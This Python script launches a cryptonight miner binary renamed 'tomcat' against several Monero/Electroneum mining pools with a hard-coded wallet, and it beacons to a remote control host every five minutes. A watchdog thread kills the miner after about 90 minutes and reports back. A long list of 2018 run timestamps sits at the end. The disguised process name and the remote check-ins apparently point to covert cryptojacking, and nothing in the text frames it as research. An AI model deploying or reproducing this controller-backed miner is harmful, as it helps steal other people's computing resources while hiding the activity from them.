import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:06.333439
#2018-02-17 16:33:01.964930
#2018-02-17 18:20:07.892876
#2018-02-17 20:08:01.607307
#2018-02-17 21:55:04.289004
#2018-02-17 23:40:01.623074
#2018-02-18 01:29:01.361587
#2018-02-18 03:16:06.799466
#2018-02-18 05:04:06.145363
#2018-02-18 06:56:04.698493
#2018-02-18 08:44:04.781404
#2018-02-18 10:31:05.740087
#2018-02-18 12:16:01.563364
#2018-02-18 14:03:05.098016
#2018-02-18 15:53:03.604808
#2018-02-18 17:43:04.084792
#2018-02-18 19:31:05.819991
#2018-02-18 21:16:06.816734
#2018-02-18 23:04:03.002986
#2018-02-19 00:51:05.054306
#2018-02-19 02:38:01.734487
#2018-02-19 04:24:01.651385
#2018-02-19 06:09:06.467550
#2018-02-19 07:56:07.261775
#2018-02-19 09:47:02.018864
#2018-02-19 11:35:09.476113
#2018-02-19 13:23:01.674260
#2018-02-19 15:10:08.349131
#2018-02-19 16:59:05.956421
#2018-02-19 18:46:06.860335
#2018-02-19 20:37:05.512135
#2018-02-19 22:23:04.224052
#2018-02-20 00:09:06.212496
#2018-02-20 01:57:04.952308
#2018-02-20 03:46:01.925082
#2018-02-20 05:30:07.719800
#2018-02-20 07:14:06.871474
#2018-02-20 09:01:04.378796
#2018-02-20 10:44:01.512195
#2018-02-20 12:29:10.696671
#2018-02-20 14:16:05.732639
#2018-02-20 16:00:14.165107
#2018-02-20 17:47:05.744294
#2018-02-20 19:39:05.020413
#2018-02-20 21:26:06.531609
#2018-02-20 23:11:07.147026
#2018-02-21 00:57:04.286380
#2018-02-21 02:45:02.948737
#2018-02-21 04:33:06.483296
#2018-02-21 06:21:01.544119
#2018-02-21 08:06:01.984486
#2018-02-21 09:52:01.271916
#2018-02-21 11:41:06.596938
#2018-02-21 13:29:09.408333
#2018-02-21 15:14:08.835467
#2018-02-21 17:04:07.630073
#2018-02-21 18:52:06.037536
#2018-02-21 20:41:08.319853
#2018-02-21 22:26:01.872806
#2018-02-22 00:15:07.889248
#2018-02-22 02:03:06.920461
#2018-02-22 03:48:03.308650
#2018-02-22 05:34:04.659044
#2018-02-22 07:19:07.853752
#2018-02-22 09:06:05.006878
#2018-02-22 10:53:09.418218
#2018-02-22 12:40:08.702166
#2018-02-22 14:26:01.582903
#2018-02-22 16:14:06.606694
#2018-02-22 18:02:01.944605
#2018-02-22 19:51:02.087094
#2018-02-22 21:40:08.726615
#2018-02-22 23:27:04.856849
#2018-02-23 01:13:09.358578
#2018-02-23 03:02:05.398740
#2018-02-23 04:48:07.992559
#2018-02-23 06:36:05.012869
#2018-02-23 08:24:04.276592
#2018-02-23 10:39:06.884175
#2018-02-23 12:33:09.653634
#2018-02-23 14:19:05.516588
#2018-02-23 16:10:12.298482
#2018-02-23 17:56:04.443131
#2018-02-23 19:43:01.416016
#2018-02-23 21:25:07.310548
#2018-02-23 23:12:07.625226
#2018-02-24 01:01:07.901904
#2018-02-24 02:55:07.072661
#2018-02-24 04:45:06.936200
#2018-02-24 06:28:07.391981
#2018-02-24 08:17:04.506973
#2018-02-24 10:03:01.727955
#2018-02-24 12:00:02.063866
#2018-02-24 13:47:04.747351
#2018-02-24 15:35:07.065679
#2018-02-24 17:29:01.486165
#2018-02-24 19:17:05.322172
#2018-02-24 21:06:05.651311
#2018-02-24 23:40:06.295519
#2018-02-25 03:37:01.906053
#2018-02-25 07:14:06.622129